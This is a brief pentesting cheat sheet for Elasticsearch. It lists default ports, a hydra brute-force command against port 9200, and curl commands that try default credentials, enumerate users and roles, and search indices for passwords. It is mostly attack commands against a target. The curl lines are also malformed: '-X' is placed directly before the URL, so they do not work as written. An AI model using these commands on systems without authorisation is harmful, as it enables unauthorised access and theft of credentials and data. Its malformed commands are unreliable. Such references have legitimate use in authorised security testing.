Elasticsearch Pentesting
Last modified: 2023-02-05
Web
It is a search engine based on the Lucene library. Default ports are 9200, 9300.
Enumeration
Brute Force Credentials
Crack the "Authorization" header in the web page.
hydra -L usernames.txt -P passwords.txt <target-ip> -s 9200 http-get /
Access over HTTP
Elasticsearch uses HTTP.
# Basic
curl -X http://10.0.0.1:9200/
# Default credentials
curl -X http://admin:elasticadmin@10.0.0.1:9200/
curl -X http://elastic:changeme@10.0.0.1:9200/
# User Enumeration
curl -X http://10.0.0.1:9200/_security/role
curl -X http://10.0.0.1:9200/_security/user
curl -X http://10.0.0.1:9200/_xpack/security/user
# Search
curl -X http://10.0.0.1:9200/_search?q=username
curl -X http://10.0.0.1:9200/_search?q=password
# Others
curl -X http://10.0.0.1:9200/_cat/
curl -X http://10.0.0.1:9200/_cluster/
curl -X http://10.0.0.1:9200/_nodes/
curl -X http://10.0.0.1:9200/_remote/
curl -X http://10.0.0.1:9200/_security/